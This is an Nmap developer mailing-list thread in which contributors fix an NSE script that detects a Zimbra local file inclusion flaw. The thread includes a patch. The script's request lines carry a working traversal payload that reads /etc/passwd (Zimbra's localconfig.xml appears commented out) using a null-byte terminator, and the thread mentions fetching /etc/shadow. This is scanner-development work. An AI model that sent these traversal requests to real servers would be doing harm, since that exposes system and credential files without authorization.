Nmap Development mailing list archives
Re: [NSE] Created NSE script to detect Zimbra 0 day
From: Paul AMAR <aos.paul () gmail com>
Date: Fri, 7 Feb 2014 10:10:11 +0100
Hi, Got quite busy and I forgot about the task. Here is the patch : Index: http-vuln-zimbra-lfi.nse =================================================================== --- http-vuln-zimbra-lfi.nse (revision 32704) +++ http-vuln-zimbra-lfi.nse (working copy) @@ -87,8 +87,8 @@ local file_long = "../../../../../../../../../etc/passwd" --local file_long = "../../../../../../../../../opt/zimbra/conf/localconfig.xml" - local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00" - local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00" + local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00" + local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00" stdnse.print_debug(1, "Trying to detect if the server is vulnerable") stdnse.print_debug(1, "GET " .. uri .. escape(url_short)) Cheers and thanks to Chris to remind me. 2014-01-09 10:18 GMT+01:00 Paul AMAR <aos.paul () gmail com>:
Hi there, Got a remark from Chris Schatz, and actually, there's some '%' symbols missing in the urls starting line 90. local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "00" local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "00" but It should be : local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00" local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00" If you all agree, i'll submit a patch in the day to patch this. Thanks Chris ! 2013/12/20 Paul AMAR <aos.paul () gmail com>Hi, Thanks for updating the script Ron. That's really weird that it was working for me though. @George, thanks for the hint with the special character "-". 2013/12/19 Ron <ron () skullsecurity net>I fixed up the code quite a bit and submitted it on irc, it cleanly detects vulnerable and patched hosts now. Ron On 19 Dec 2013 10:34, George Chatzisofroniou <sophron () latthi com> wrote:On Wed, Dec 18, 2013 at 06:18:57PM -0600, Ron wrote:The issue with the script as-is is, once the vuln is patched, it'llkeepreporting it's vulnerable, I think, unless they just delete thefile. ifyou try to grab a "bad" file (like /etc/shadow), everything seem toworkfine.There are some fixes around already. By fixing the LFI, the HTTPresponse statuswon't be 200, so the script will not return a false positive.It works if I switch out the string.match() with "==". I don't know why, though!That's because Lua string.match() method expects a pattern as a secondargument(not a raw string) and the special "-" character is interpreted as theLuamodifier for repetitions. Thanks for cathing this. -- George Chatzisofroniou_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: [NSE] Created NSE script to detect Zimbra 0 day Paul AMAR (Jan 09)
- Re: [NSE] Created NSE script to detect Zimbra 0 day Paul AMAR (Feb 07)
- Re: [NSE] Created NSE script to detect Zimbra 0 day Daniel Miller (Feb 07)
- Re: [NSE] Created NSE script to detect Zimbra 0 day Paul AMAR (Feb 07)